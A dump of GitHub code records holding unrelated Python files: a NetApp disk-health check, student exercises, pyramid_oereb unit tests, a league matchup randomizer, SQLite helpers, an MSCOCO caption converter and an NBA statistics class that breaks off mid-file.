'vendor': 'NETAPP',\n 'firmware_version': 'NA00',\n 'usable_size': 3992785256448,\n 'self_encrypting': False,\n 'class': 'capacity',\n 'home_node': {\n 'uuid': 'f3a35903-68ae-11e8-8898-4b3d2df62ccf',\n 'name': 'acme01',\n '_links': {'self': {'href': '/api/cluster/nodes/f3a35903-68ae-11e8-8898-4b3d2df62ccf'}}\n },\n 'container_type': 'shared',\n 'name': '1.0.9',\n 'uid': '5000CCA2:6938888C:00000000:00000000:00000000:00000000:00000000:00000000:00000000:00000000',\n 'bay': 9,\n 'model': 'X336_HAKPE04TA07',\n 'serial_number': 'K7H02UUL',\n 'type': 'fsas',\n 'state': 'present',\n 'pool': 'pool0'})\n\"\"\"\n\ndef run():\n parser = cli.Parser()\n parser.add_optional_arguments(cli.Argument.EXCLUDE,\n cli.Argument.INCLUDE)\n parser.add_optional_arguments( {\n 'name_or_flags': ['--mode'],\n 'options': {\n 'action': 'store',\n 'choices': [\n 'multipath',\n 'diskhealth',\n ],\n 'default': 'diskhealth',\n 'help': 'which diskhealth mode to check',\n }\n })\n args = parser.get_args()\n # Setup module logging\n logger = logging.getLogger(__name__)\n logger.disabled = True\n if args.verbose:\n for log_name, log_obj in logging.Logger.manager.loggerDict.items():\n log_obj.disabled = False\n logging.getLogger(log_name).setLevel(severity(args.verbose))\n\n check = Check()\n\n setup_connection(args.host, args.api_user, args.api_pass)\n\n try:\n software = Software()\n software.get(fields='version')\n disk_count = Disk.count_collection()\n logger.debug(f\"Found {disk_count} disks\")\n if disk_count == 0:\n logger.debug(f\"found {disk_count} disks\")\n check.exit(Status.UNKNOWN, \"no disks found\")\n Disks = Disk.get_collection(fields=\"*\")\n except NetAppRestError as error:\n check.exit(Status.UNKNOWN, f\"ERROR => {error}\")\n\n if args.mode == \"multipath\":\n minimumVersion = \"9.9\"\n if compareVersion(minimumVersion,software[\"version\"]):\n check_multipath(check,logger,args,Disks)\n else:\n check.exit(Status.UNKNOWN,f\"at least ONTAP v{minimumVersion} is required. Currently v{software['version']} is installed\")\n elif args.mode == \"diskstate\":\n check_diskstate(check,logger,args,Disks)\n else:\n check_diskstate(check,logger,args,Disks)\n\n (code,message) = check.check_messages(separator='\\n ')\n check.exit(code=code,message=message)\n\ndef check_multipath(check,logger,args,Disks):\n \"\"\"\n Minimum ONTAP v9.9 is required\n Disk({\n 'paths': [\n {'wwnn': '5000039a88191df8', 'port_name': 'B', 'initiator': '0d', 'port_type': 'sas', 'wwpn': '5000039a88191dfa'},\n {'wwnn': '5000039a88191df8', 'port_name': 'A', 'initiator': '0a', 'port_type': 'sas', 'wwpn': '5000039a88191df9'},\n {'wwnn': '5000039a88191df8', 'port_name': 'A', 'initiator': '0d', 'port_type': 'sas', 'wwpn': '5000039a88191df9'},\n {'wwnn': '5000039a88191df8', 'port_name': 'B', 'initiator': '0a', 'port_type': 'sas', 'wwpn': '5000039a88191dfa'}\n ],\n \"\"\"\n logger.info(\"starting multipath check\")\n count = 0\n for disk in Disks:\n if (args.exclude or args.include) and item_filter(args,disk.name):\n continue\n if not hasattr(disk,'paths'):\n logger.debug(f\"{disk}\")\n continue\n if len(disk.paths) % 2 != 0:\n check.add_message(Status.WARNING, f\"Disk {disk.name:7} on bay {disk.bay:2} of node {disk.node.name} has {len(disk.paths)} paths\")\n count += 1\n check.add_perfdata(label=f\"total\",value=int(count))\n if count == 1:\n check.add_message(Status.OK,f\"{count} disk has symmetric paths\")\n else:\n check.add_message(Status.OK,f\"{count} disks have symmetric paths\")\n\ndef check_diskstate(check,logger,args,Disks):\n out = {}\n cType = {}\n disk_count = Disk.count_collection()\n for disk in Disks:\n if (args.exclude or args.include) and item_filter(args,disk.name):\n disk_count -= 1\n continue\n logger.debug(f\"{disk}\")\n\n #Aggregate = Disk is used as a physical disk in an aggregate.\n #Broken = Disk is in broken pool.\n #Foreign = Array LUN has been marked foreign.\n #Labelmaint = Disk is in online label maintenance list.\n #Maintenance = Disk is in maintenance center.\n #Mediator = A mediator disk is a disk used on non-shared HA systems hosted by an external node which is used to communicate the viability of the storage failover between non-shared HA nodes.\n #Remote = Disk belongs to the remote cluster.\n #Shared = Disk is partitioned or in a storage pool.\n #Spare = Disk is a spare disk.\n #Unassigned = Disk ownership has not been assigned.\n #Unknown = Container is currently unknown. This is the default setting.\n #Unsupported = Disk is not supported.\n\n if not hasattr(disk, 'state'):\n setattr(disk, 'state', disk.container_type)\n\n stateWarn = re.match('reconstructing', disk.state)\n stateCrit = re.match('(broken|offline)', disk.state)\n\n if disk.container_type not in cType:\n cType[disk.container_type] = 0\n cType[disk.container_type] += 1\n\n out[disk.name] = {}\n out[disk.name]['name'] = disk.name\n out[disk.name]['state'] = disk.state\n out[disk.name]['bay'] = disk.bay\n out[disk.name]['node'] = disk.home_node.name if hasattr(disk, 'home_node') else \"unknown\"\n \n if disk.container_type in [\"unassigned\",\"unsupported\",\"unknown\"]:\n m = f\"Disk {disk.name:7} on bay {disk.bay:2} is {disk.container_type}\"\n check.add_message(Status.WARNING,m)\n elif disk.container_type != \"remote\":\n if disk.node.uuid != disk.home_node.uuid:\n check.add_message(Status.WARNING, f\"Disk {disk.name} is on node {disk.node.name} instead of {disk.home_node.name}\")\n m = f\"Disk {disk.name:7} on bay {disk.bay:2} of node {disk.home_node.name} is {disk.state}\"\n if stateWarn:\n check.add_message(Status.WARNING,m)\n elif stateCrit:\n check.add_message(Status.CRITICAL,m)\n\n for c in cType.keys():\n check.add_perfdata(label=c,value=int(cType[c]))\n check.add_perfdata(label=f\"total\",value=int(disk_count))\n check.add_message(Status.OK, f\"found {disk_count} disks at all while { ' - '.join({ f'{v} {k}' for (k,v) in cType.items()}) } \")\n for d in sorted(out.keys()):\n check.add_message(Status.OK, f\"Disk {out[d]['name']:7} on bay {out[d]['bay']:2} of node {out[d]['node']} is {out[d]['state']}\")\n\nif __name__ == \"__main__\":\n run()","repo_name":"ConSol-Monitoring/check_ontap","sub_path":"checkontap/ontapcmd/diskhealth.py","file_name":"diskhealth.py","file_ext":"py","file_size_in_byte":7867,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"2175215977","text":"#-------------------------------------------------------------------------------------\r\n#UFRJ - IM - DMA - TMAA-2019.1\r\n#-------------------------------------------------------------------------------------\r\n#14 de março de 2019 - Lista 1 - Problema 2 - \"Múltiplos de X e Y\"\r\n#-------------------------------------------------------------------------------------\r\n#Lucas Galdino de Souza (119039091)\r\n#-------------------------------------------------------------------------------------\r\n\r\nprint('\\n\\t\\tMúltiplos de X e Y')\r\n\r\na1 = int(input('digite um valor: ')) # Valor 1\r\nb1 = int(input('digite um valor: ')) # Valor 2\r\nl = int(input('digite um valor maximo dos multiplos: ')) # Múltiplos abaixo desse valor\r\n\r\nan = int(l // a1) # Números de múltiplos de um valor\r\nla =[]\r\n\r\nbn = int(l // b1) # Números de múltiplos de outro valor\r\nlb = []\r\n\r\nabn = int (l // (a1*b1)) # Números de múltiplos iguais aos dois valores\r\nlab = []\r\n\r\ni = 1\r\nj = 1\r\nk = 1\r\n\r\nif l % a1 == 0: # Caso o resto for zero, retirar 1, pois o 'l' não faz parte da lista\r\n an = an - 1\r\n\r\nif l % b1 == 0:\r\n bn = bn - 1\r\n \r\nwhile len(la) < an : # Adicioando os múltiplos a lista (1° valor)\r\n la.append(a1*i)\r\n i = i + 1\r\n \r\n \r\nprint('\\nOs múltiplos de {} abaixo de {} é ou são {}.'.format(a1, l, la), end = \" \")\r\n\r\nwhile len(lb) < bn : # Adicioando os múltiplos a lista (1° valor)\r\n lb.append(b1*j)\r\n j = j + 1\r\n\r\nprint('Os múltiplos de {} abaixo de {} é ou são {}'.format(b1, l, lb))\r\n\r\nwhile len(lab) < abn : # Adicioando os múltiplos a lista (valores igual)\r\n lab.append(a1*b1*k)\r\n k = k + 1\r\n\r\ns1 = sum(la) # somando a lista 1\r\ns2 = sum(lb) # somando a lista 2\r\ns12 = sum(lab) # somando a lista combinada de 1 e 2\r\n\r\ns3 = 0\r\ns3 = s1 + s2 - s12 # Calculando a soma dos múltiplos \r\n\r\nprint('Portando a soma dos múltiplos de {} e {} é {}.'.format(a1, b1, s3))\r\n\r\nsaida = input('')\r\n","repo_name":"LucasGaldino13/TMAA-2019.1","sub_path":"14 de março - lista 1 - problema 2.py","file_name":"14 de março - lista 1 - problema 2.py","file_ext":"py","file_size_in_byte":1906,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22692061180","text":"N = int(input())\ninfo = []\n\nfor _ in range(N):\n n, p = input().split()\n mp = p.replace('1', '@').replace('0', '%').replace('l', 'L').replace('O', 'o')\n if mp != p:\n info.append((n, mp))\n\n\nif not len(info) :\n if N == 1:\n print(\"There is 1 account and no account is modified\")\n else:\n print(f\"There are {N} accounts and no account is modified\")\nelse:\n print(len(info))\n for n, mp in info:\n print(n, mp)\n","repo_name":"xiaoyuzaijia/PAT_Advance_level","sub_path":"1035 Password.py","file_name":"1035 Password.py","file_ext":"py","file_size_in_byte":450,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"9715485084","text":"import io\nfrom pyramid_oereb.core.records.extract import ExtractRecord\nfrom pyramid_oereb.core.records.law_status import LawStatusRecord\nimport pytest\nimport datetime\n\nfrom shapely.wkt import loads\nfrom unittest.mock import patch\nfrom PIL import Image\n\nfrom pyramid.testing import DummyRequest\n\nfrom pyramid_oereb.core import b64\nfrom pyramid_oereb.core.adapter import FileAdapter\nfrom pyramid_oereb.core.records.image import ImageRecord\nfrom pyramid_oereb.core.records.theme import ThemeRecord\nfrom pyramid_oereb.core.records.view_service import LegendEntryRecord\nfrom pyramid_oereb.core.records.real_estate import RealEstateRecord\nfrom pyramid_oereb.core.hook_methods import compare, get_symbol, get_symbol_ref, \\\n get_logo_ref, get_qr_code_ref, get_surveying_data_update_date, \\\n plr_sort_within_themes\nfrom pyramid_oereb.contrib.data_sources.standard.sources.plr import StandardThemeConfigParser\nimport pyramid_oereb.contrib.data_sources.standard.hook_methods\nfrom tests.core.records.test_extract import create_dummy_extract\nfrom tests.core.records.test_plr import create_dummy_plr\n\ntry:\n from urllib.parse import urlparse\nexcept ImportError:\n from urlparse import urlparse\n\n\n@pytest.fixture\ndef legend_entry_data(pyramid_oereb_test_config, dbsession, transact, file_adapter):\n del transact\n theme_config = pyramid_oereb_test_config.get_theme_config_by_code('ch.BelasteteStandorte')\n config_parser = StandardThemeConfigParser(**theme_config)\n models = config_parser.get_models()\n\n view_services = {\n models.ViewService(**{\n 'id': 1,\n 'reference_wms': 'http://www.example.com',\n 'layer_index': 1,\n 'layer_opacity': 1.0,\n })\n }\n dbsession.add_all(view_services)\n\n legend_entries = [\n models.LegendEntry(**{\n 'id': '1',\n 'symbol': b64.encode(file_adapter.read('tests/resources/symbol.png')),\n 'legend_text': {'de': 'Test'},\n 'type_code': 'CodeA',\n 'type_code_list': 'type_code_list',\n 'theme': 'ch.BelasteteStandorte',\n 'view_service_id': '1'\n })\n ]\n dbsession.add_all(legend_entries)\n dbsession.flush()\n\n yield legend_entries\n\n\n@pytest.fixture\ndef png_image():\n yield Image.new(\"RGB\", (72, 36), (128, 128, 128))\n\n\n@pytest.fixture\ndef png_binary(png_image):\n output = io.BytesIO()\n png_image.save(output, format='PNG')\n yield output.getvalue()\n\n\ndef test_get_symbol():\n with pytest.raises(NotImplementedError):\n binary_image, content_type = get_symbol({'identifier': \"1\"}, {})\n\n\n@patch.object(pyramid_oereb.core.hook_methods, 'route_prefix', 'oereb')\ndef test_get_symbol_ref(pyramid_test_config):\n record = LegendEntryRecord(\n ImageRecord(FileAdapter().read('tests/resources/logo_canton.png')),\n {'de': 'Test'},\n 'CodeA',\n 'http://my.codelist.com/test.xml',\n ThemeRecord('ch.BelasteteStandorte', {'de': 'Belastete Standorte'}, 410),\n view_service_id='1',\n identifier=\"1\"\n )\n request = DummyRequest()\n url = urlparse(get_symbol_ref(request, record))\n assert url.path == '/image/symbol/ch.BelasteteStandorte/legend_entry.png'\n\n\n@pytest.mark.parametrize('test_value, expected_results', [\n ({\n 'logo_code': 'ch',\n 'language': 'de',\n }, '/image/logo/ch/de.png'),\n ({\n 'logo_code': 'bs',\n 'language': 'fr',\n }, '/image/logo/bs/fr.png')\n ])\ndef test_get_logo_ref(test_value, expected_results, png_binary):\n request = DummyRequest()\n url = urlparse(get_logo_ref(request,\n test_value.get('logo_code'),\n test_value.get('language'),\n {test_value.get('language'): ImageRecord(png_binary)}\n ))\n assert url.path == expected_results\n\n\n@pytest.mark.parametrize('test_value, expected_results', [\n ('', ''),\n ({}, {}),\n (None, None)\n ])\ndef test_get_qr_code_ref(test_value, expected_results):\n request = DummyRequest()\n assert get_qr_code_ref(request, test_value) == expected_results\n\n\ndef test_get_surveying_data_date():\n real_estate = RealEstateRecord('test_type', 'BL', 'Nusshof', 1, 100,\n loads('POLYGON((0 0, 0 1, 1 1, 1 0, 0 0))'))\n update_date_os = get_surveying_data_update_date(real_estate)\n assert isinstance(update_date_os, datetime.datetime)\n\n\ndef test_plr_sort_within_themes():\n record = create_dummy_extract()\n sorted_extract = plr_sort_within_themes(record)\n assert isinstance(sorted_extract, ExtractRecord)\n\n\ndef test_compare():\n assert compare(create_dummy_plr(), create_dummy_plr()) == 0\n\n plr1 = create_dummy_plr()\n plr1.law_status = LawStatusRecord('AenderungMitVorwirkung', {})\n plr1.theme.code = 'ch.Nutzungsplanung'\n plr1.sub_theme = ''\n plr2 = create_dummy_plr()\n plr2.law_status = LawStatusRecord('inKraft', {})\n plr2.theme.code = 'ch.Nutzungsplanung'\n plr2.sub_theme = ''\n\n assert compare(plr1, plr2) == 1\n assert compare(plr2, plr1) == -1\n\n plr1.law_status = LawStatusRecord('inKraft', {})\n assert compare(plr1, plr2) == 0\n","repo_name":"openoereb/pyramid_oereb","sub_path":"tests/core/test_hook_methods.py","file_name":"test_hook_methods.py","file_ext":"py","file_size_in_byte":5201,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"53"} +{"seq_id":"70549071209","text":"import random\nimport json\n\n\nclass MatchupRandomizerHelper:\n\tdef __init__(self):\n\t\tself.__teams_dictionary__ = dict()\n\n\t\tfor tier in self.data_by_tiers_season_cycle[self.current_cycle]:\n\t\t\tself.__teams_dictionary__[tier] = dict.fromkeys(\n\t\t\t\tself.data_by_tiers_season_cycle[self.current_cycle][tier],\n\t\t\t\tdict(\n\t\t\t\t\tplayed_in_tier=[],\n\t\t\t\t\tplayed=[],\n\t\t\t\t\tnot_played=[],\n\t\t\t\t)\n\t\t\t)\n\t\t\t\n\t\t# creating seed from current season and cycle\n\t\tseason_seed = self.current_season*1e3\n\t\tcycle_seed = self.current_cycle*1e0\n\t\tseed = int(season_seed + cycle_seed)\n\n\t\t# seed random\n\t\trandom.seed(seed)\n\n\t\t# initalize\n\t\tself.__build_teams_dictionary__()\n\t\tself.__initialize_graphs__()\n\n\t\twith open(f'./_dash_league_season-{self.current_season}_cycle-{self.current_cycle}.json', 'w') as f:\n\t\t\tjson.dump(self.__teams_dictionary__, f)\n\n\n\tdef check_graph_solved(self, graph):\n\t\treturn all(len(graph.edges([team])) == self.n_matchups_per_team for team in self.teams)\n\n\n\tdef check_current_team(self, graph, team):\n\t\treturn len(graph.edges([team])) == self.n_matchups_per_team\n\t\n\n\tdef __get_matchups__(self, availability_graph, matchup_graph, i=0, j=0):\n\t\tif self.check_graph_solved(matchup_graph):\n\t\t\treturn True, availability_graph, matchup_graph\n\n\t\tif i >= self.n_teams:\n\t\t\treturn False, availability_graph, matchup_graph\n\n\t\tavailability_graph_copy = availability_graph.copy()\n\t\tmatchup_graph_copy = matchup_graph.copy()\n\n\t\tteam = self.teams[i]\n\n\t\tif self.check_current_team(matchup_graph_copy, team):\n\t\t\tfor t in self.teams:\n\t\t\t\tif availability_graph_copy.has_edge(t, team):\n\t\t\t\t\tavailability_graph_copy.remove_edge(t, team)\n\t\t\t\t\t\n\t\t\treturn self.__get_matchups__(availability_graph_copy, matchup_graph_copy, i+1, 0)\n\n\t\tvalid_edges = list(availability_graph.edges(team))\n\n\t\tif j >= len(valid_edges):\n\t\t\treturn False, availability_graph, matchup_graph\n\n\t\tother_team = valid_edges[j][1]\n\n\t\tavailability_graph_copy.remove_edge(team, other_team)\n\n\t\tmatchup_graph_copy.add_edge(team, other_team)\n\n\t\tif self.check_current_team(matchup_graph_copy, team):\n\t\t\tfor t in self.teams:\n\t\t\t\tif availability_graph_copy.has_edge(t, team):\n\t\t\t\t\tavailability_graph_copy.remove_edge(t, team)\n\n\t\t\treturn self.__get_matchups__(availability_graph_copy, matchup_graph_copy, i+1, 0)\n\t\t\n\t\tisValid, A, M = self.__get_matchups__(availability_graph_copy, matchup_graph_copy, i, j+1)\n\n\t\tif isValid:\n\t\t\treturn True, A, M\n\n\t\treturn self.__get_matchups__(availability_graph, matchup_graph, i, j+1)\n\t\n\n\tdef __initialize_graphs__(self):\n\t\tfor team in self.__teams_dictionary__['dasher']:\n\t\t\tself.availability_graph.add_node(team)\n\t\t\tself.matchup_graph.add_node(team)\n\n\t\tfor team in self.__teams_dictionary__['dasher']:\n\t\t\tconnections = []\n\t\t\tfor matchup in self.__teams_dictionary__['dasher'][team]['not_played']:\n\t\t\t\tconnections.append((team, matchup))\n\n\t\t\tself.availability_graph.add_edges_from(connections)\n\n\t\tteams = list(self.__teams_dictionary__['dasher'].keys())\n\t\tteams.sort(key=lambda team: len(self.__teams_dictionary__['dasher'][team]['not_played']))\n\t\n\n\tdef __build_teams_dictionary__(self):\n\t\t'''\n\t\tThis method builds a dictionary of teams by tier, which contains the matchup to be played in the current season. It will prevent matches that have been played in the current season from reoccuring. If it fails to find non-rematches, it only then will return rematches.\n\t\t'''\n\t\t\n\t\tfor tier in self.data_by_tiers_season_cycle[self.current_cycle]:\n\t\t\tteams = self.data_by_tiers_season_cycle[self.current_cycle][tier]\n\n\t\t\tfor team in teams:\n\t\t\t\tplayed = []\n\n\t\t\t\t# Gotta love O(n^2)\n\t\t\t\tfor cycle in range(1, self.current_cycle+1):\n\t\t\t\t\t_matchups = self.data_by_matchups_season_cycle[cycle]\n\n\t\t\t\t\t# Sometimes teams join late and therefore may not exist in past cycles\n\t\t\t\t\tif team in _matchups:\n\t\t\t\t\t\texisting_matchups = _matchups[team]\n\t\t\t\t\t\tplayed.extend(set(existing_matchups))\n\n\t\t\t\t# a set of played matches \n\t\t\t\tplayed = set(played)\n\n\t\t\t\t# Check if any teams in the selected matchup_cycle\n\t\t\t\t# are not playing in the current cycle of the season.\n\t\t\t\t# In other words, the intersection of the teams in the\n\t\t\t\t# selected matchup cycle and the current cycle of the season\n\t\t\t\tplayed_in_tier = played & set(teams)\n\n\t\t\t\t# exclusive left join on the sets of teams in the current tier,\n\t\t\t\t# played and non full matchups, and the currently selected team\n\t\t\t\tnot_played = set(teams) - (played | set([team]))\n\n\t\t\t\tself.__teams_dictionary__[tier][team] = dict(\n\t\t\t\t\tplayed_in_tier=list(played_in_tier),\n\t\t\t\t\tplayed=list(played),\n\t\t\t\t\tnot_played=list(not_played),\n\t\t\t\t)\n\t\t","repo_name":"vadManuel/dash-league-randomizer","sub_path":"back/DashLeagueFetcher/MatchupRandomizerHelper.py","file_name":"MatchupRandomizerHelper.py","file_ext":"py","file_size_in_byte":4520,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"5391683996","text":"\"\"\"Run this file to start the model\"\"\"\n\nfrom package.parser import Parser\nfrom package.batch_manager import BatchManager\nfrom package.predictors import Predictors\n\nclass Model:\n '''\n Error Correcting Neural Network\n -------------------------------\n The Error-Correcting Neural Network class manages the network \n architecture to accelerate molecular dynamic simulations.\n '''\n\n def __init__(self):\n verbose = True\n test_mode = True\n structure = Parser.get_structure_from_files(verbose=verbose, test_mode=test_mode)\n batcher = BatchManager(structure, verbose=verbose)\n x, y = batcher.get_clean_dataset()\n self.predictors = Predictors(x, y, verbose=verbose, test_mode=test_mode)\n\n def run(self):\n '''This method starts the program.'''\n self.predictors.predict()\n\nif __name__ == \"__main__\":\n model = Model()\n model.run()","repo_name":"rathsidd/Dynamical-Analysis","sub_path":"JustinShaw/ECNN/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":904,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"14477917634","text":"import sqlite3\nimport csv\nimport pandas\n\ndef get_domain(url):\n return url.split(\"://\")[1].split(\"/\")[0]\n\n\ndef execSQL(query, connection='db.db'):\n db = sqlite3.connect(connection)\n db.execute(query)\n db.commit()\n db.close()\n\n\ndef create(table, query, connection='db.db'):\n db = sqlite3.connect(connection)\n db.create_function(\"domain_of_url\", 1, get_domain)\n db.execute(\"create table if not exists \" + table + \" as \" + query)\n db.close()\n \n\ndef save(file, table, connection='db.db'):\n with open(f\"{file}.csv\", \"w\", newline='') as file:\n cursor = sqlite3.connect(connection).cursor()\n writer = csv.writer(file)\n data = cursor.execute(\"SELECT * FROM \" + table)\n col = []\n for x in data.description:\n col.append(x[0])\n writer.writerow(col)\n\n writer.writerows(data)\n\ndef load(file, table, connection='db.db'):\n db = sqlite3.connect(connection)\n pandas.read_csv(f'{file}').to_sql(name=table, con=db, if_exists='append', index=False)\n db.close()","repo_name":"savin1400914/Pipelines","sub_path":"pipelines/datawork.py","file_name":"datawork.py","file_ext":"py","file_size_in_byte":1041,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38315850224","text":"import json\nimport os\nimport random\n\n\ndef convert_mscoco_to_instruction(input_file, output_file, img_directory):\n with open(input_file, 'r') as f:\n data = json.load(f)\n\n image_dict = {}\n for item in data['annotations']:\n image_id = item['image_id']\n if image_id not in image_dict:\n image_dict[image_id] = []\n image_dict[image_id].append(item['caption'])\n\n converted_data = []\n for image_id, captions in image_dict.items():\n # image_file = os.path.join(img_directory, f\"COCO_{'train' if 'train' in img_directory else 'val'}2017_{str(image_id).zfill(12)}.jpg\")\n image_file = os.path.join(img_directory, f\"{str(image_id).zfill(12)}.jpg\")\n \n instruction = random.choice([\n \"A short image caption:\",\n \"A short image description:\",\n \"A photo of\",\n \"An image that shows\",\n \"Write a short description for the image.\",\n \"Write a description for the photo.\",\n \"Provide a description of what is presented in the photo.\",\n \"Briefly describe the content of the image.\",\n \"Can you briefly explain what you see in the image?\",\n \"Could you use a few words to describe what you perceive in the photo?\",\n \"Please provide a short depiction of the picture.\",\n \"Using language, provide a short account of the image.\",\n \"Use a few words to illustrate what is happening in the picture.\",\n ])\n # caption = max(captions, key=len).strip().capitalize()\n for caption in captions:\n caption = caption.strip().capitalize()\n if caption[-1] not in ['.', '?', '!']:\n caption += '.'\n converted_item = {\n \"input\": f\"{instruction}/cpfs/user/chendelong/downloads/mscoco_2017/{image_file}\",\n \"output\": caption,\n }\n converted_data.append(converted_item)\n print(len(converted_data))\n\n random.shuffle(converted_data)\n with open(output_file, 'w') as f:\n json.dump(converted_data, f, indent=4)\n\n\nif __name__ == \"__main__\":\n os.makedirs('converted_datasets/coco_2017_captions', exist_ok=True)\n convert_mscoco_to_instruction(\n \"/cpfs/user/chendelong/downloads/mscoco_2017/annotations/captions_train2017.json\",\n \"converted_datasets/coco_2017_captions/coco_2017_captions_train.json\",\n \"train2017\"\n )\n convert_mscoco_to_instruction(\n \"/cpfs/user/chendelong/downloads/mscoco_2017/annotations/captions_val2017.json\",\n \"converted_datasets/coco_2017_captions/coco_2017_captions_val.json\",\n \"val2017\"\n )\n","repo_name":"ChenDelong1999/instruct-flamingo","sub_path":"instruction_dataset/mscoco_to_instruction.py","file_name":"mscoco_to_instruction.py","file_ext":"py","file_size_in_byte":2689,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"53"} +{"seq_id":"4023601164","text":"\"\"\"Year class.\"\"\"\nimport pandas as pd\nimport datetime\nfrom nba_api.stats import endpoints\nfrom nba_api.stats.library.parameters import SeasonType, SeasonTypePlayoffs\nfrom objects.helper import nba_team_ids, scrape_current_nba_injuries\nimport time\nimport math\nimport numpy as np\n\n\nclass year:\n \"\"\"Create year class.\"\"\"\n\n def __init__(self, year):\n \"\"\"Initialize year class.\"\"\"\n self.year = year\n next_year_abb = str(self.year - 1999)\n if len(next_year_abb) == 1:\n next_year_abb = \"0\" + next_year_abb\n self.season = str(self.year) + \"-\" + next_year_abb\n self.game_data_cache = pd.DataFrame()\n self.playoff_game_data_cache = pd.DataFrame()\n self.playoff_boxes_cache = pd.DataFrame()\n self.regular_boxes_cache = pd.DataFrame()\n self.injured_cache = dict()\n self.roster_info_cache = pd.DataFrame()\n self.regular_boxes_cache_only_played = pd.DataFrame()\n self.update_timestamp_game_data = datetime.datetime.now()\n self.update_timestamp_regular_boxes = datetime.datetime.now()\n self.update_timestamp_playoff_game_data = datetime.datetime.now()\n self.update_timestamp_playoff_boxes = datetime.datetime.now()\n self.update_timestamp_sit_or_injured_playoff = datetime.datetime.now()\n self.update_timestamp_roster_info = datetime.datetime.now()\n print(f\"-->Loading data for {self.season}...\")\n loader_1 = self.roster_info.copy()\n loader_2 = self.game_data.copy()\n loader_3 = self.regular_boxes.copy()\n loader_4 = self.playoff_game_data.copy()\n loader_5 = self.playoff_boxes.copy()\n loader_6 = self.sit_or_injured_playoff.copy()\n\n @property\n def roster_info(self):\n \"\"\"Define roster info.\"\"\"\n if (self.roster_info_cache.empty) or (\n (datetime.datetime.now().year in [self.year, self.year + 1])\n and (\n datetime.datetime.now() - self.update_timestamp_roster_info\n > datetime.timedelta(seconds=3600)\n )\n ) and (self.playoff_game_data.shape[0] == 0):\n print(\"---->Loading or updating player info...\")\n all_players = []\n for team_id in self.regular_boxes.TEAM_ID.unique():\n roster = endpoints.commonteamroster.CommonTeamRoster(\n team_id=team_id, season=self.season\n ).get_data_frames()[0]\n all_players.append(roster)\n time.sleep(2)\n all_players = pd.concat(all_players)\n self.roster_info_cache = all_players[\n [\"TeamID\", \"PLAYER_ID\", \"POSITION\"]\n ].rename({\"TeamID\": \"TEAM_ID\"}, axis=1)\n self.update_timestamp_roster_info = datetime.datetime.now()\n return self.roster_info_cache\n\n @property\n def game_data(self) -> None:\n \"\"\"Set game data in object cache in long format.\"\"\"\n if self.game_data_cache.shape[0] == 0:\n print(\n \"---->Loading regular season game data for this year for the first time...\"\n )\n all_games = (\n endpoints.leaguegamefinder.LeagueGameFinder(\n season_type_nullable=SeasonType.regular, season_nullable=self.season\n )\n .get_data_frames()[0]\n .query(\"TEAM_ID in @nba_team_ids\")\n )\n time.sleep(2)\n elif (datetime.datetime.now().year in [self.year, self.year + 1]) and (\n datetime.datetime.now() - self.update_timestamp_game_data\n > datetime.timedelta(seconds=3600)\n ) and (self.playoff_game_data.shape[0] == 0):\n print(\"Updating resular season game data.\")\n all_games = (\n endpoints.leaguegamefinder.LeagueGameFinder(\n season_type_nullable=SeasonType.regular, season_nullable=self.season\n ).get_data_frames()[0].query(\"TEAM_ID in @nba_team_ids\").query(\"WL.notna()\")\n )\n self.update_timestamp_game_data = datetime.datetime.now()\n time.sleep(2)\n else:\n return self.game_data_cache\n all_games[\"HOME_AWAY\"] = [\n \"H\" if x == 1 else \"A\" for x in all_games.MATCHUP.str.contains(\"vs\")\n ]\n all_games = all_games[\n [\n \"GAME_ID\",\n \"GAME_DATE\",\n \"HOME_AWAY\",\n \"TEAM_ID\",\n \"TEAM_ABBREVIATION\",\n \"PTS\",\n \"FGM\",\n \"FGA\",\n \"FG_PCT\",\n \"FG3M\",\n \"FG3A\",\n \"FG3_PCT\",\n \"FTM\",\n \"FTA\",\n \"FT_PCT\",\n \"OREB\",\n \"DREB\",\n \"REB\",\n \"AST\",\n \"STL\",\n \"BLK\",\n \"TOV\",\n \"PF\",\n \"PLUS_MINUS\",\n ]\n ].copy()\n all_games = all_games.pivot(index=\"GAME_ID\", columns=\"HOME_AWAY\").reset_index()\n all_games.columns = all_games.columns.map(lambda x: \"_\".join(x))\n all_games[\"OUTCOME\"] = [\n 0 if PLUS_MINUS_H < 0 else 1 for PLUS_MINUS_H in all_games.PLUS_MINUS_H\n ]\n all_games = (\n all_games.rename(\n columns={\"GAME_DATE_H\": \"GAME_DATE\", \"GAME_ID_\": \"GAME_ID\"}\n )\n .drop([\"GAME_DATE_A\"], axis=1)\n .copy()\n )\n self.game_data_cache = all_games.query(\n \"TEAM_ID_H in @nba_team_ids & TEAM_ID_A in @nba_team_ids\"\n )\n return self.game_data_cache\n\n @property\n def regular_boxes(self) -> None:\n \"\"\"Set regular season player box summaries.\"\"\"\n if self.regular_boxes_cache.shape[0] == 0:\n print(\n \"---->Loading regular season player box data for this year for the first time...\"\n )\n self.regular_boxes_cache = (\n endpoints.PlayerGameLogs(\n season_type_nullable=SeasonType.regular, season_nullable=self.season\n )\n .get_data_frames()[0]\n .query(\"TEAM_ID in @nba_team_ids\")\n )\n time.sleep(2)\n elif ((datetime.datetime.now().year in [self.year, self.year + 1]) and (\n datetime.datetime.now() - self.update_timestamp_regular_boxes\n > datetime.timedelta(seconds=3600)\n )) and (self.playoff_game_data.shape[0] == 0):\n print(\"---->Updating regular season box data...\")\n self.regular_boxes_cache = (\n endpoints.PlayerGameLogs(\n season_type_nullable=SeasonType.regular, season_nullable=self.season\n )\n .get_data_frames()[0]\n .query(\"TEAM_ID in @nba_team_ids\")\n )\n self.update_timestamp_regular_boxes = datetime.datetime.now()\n time.sleep(2)\n return self.regular_boxes_cache\n\n @property\n def regular_boxes_summary(self):\n \"\"\"Get box scores 